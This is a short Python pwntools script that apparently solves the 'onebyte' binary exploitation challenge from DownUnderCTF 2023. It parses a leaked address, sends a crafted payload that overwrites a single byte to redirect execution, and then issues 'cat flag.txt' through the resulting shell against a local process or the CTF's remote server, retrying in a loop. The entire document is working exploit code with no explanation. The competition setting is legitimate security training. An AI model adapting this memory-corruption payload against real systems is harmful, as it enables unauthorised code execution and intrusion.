45 lines
874 B
Python
45 lines
874 B
Python
from pwn import *
|
|
import os
|
|
|
|
os.environ["PWNLIB_DEBUG"] = "1"
|
|
|
|
gs = '''
|
|
unset env LINES
|
|
unset env COLUMNS
|
|
set follow-fork-mode child
|
|
br *main+93
|
|
c
|
|
'''
|
|
|
|
elf = ELF(os.getcwd()+"/onebyte")
|
|
|
|
def start():
|
|
if args.GDB:
|
|
return gdb.debug(elf.path, gs)
|
|
if args.REMOTE:
|
|
return remote("2023.ductf.dev", 30018)
|
|
else:
|
|
return process(elf.path)
|
|
|
|
while True:
|
|
io = start()
|
|
|
|
io.recvuntil("Free junk: ")
|
|
x = io.recvline()
|
|
x = int(x[2:-1],16)
|
|
|
|
print(hex(x))
|
|
|
|
print(io.recvuntil("Your turn: "))
|
|
# io.send(p32(x+70)+ cyclic(8) + p32(x+70))
|
|
io.send(p32(x+70) +p32(x+70) +p32(x+70) + p32(x+70) + b"\x80")
|
|
io.sendline(b"cat flag.txt")
|
|
print(io.recvall(timeout=2))
|
|
# break
|
|
# try:
|
|
# io.send(b"id")
|
|
# print(io.recvline())
|
|
# io.interactive()
|
|
# except:
|
|
# io.close()
|
|
# continue |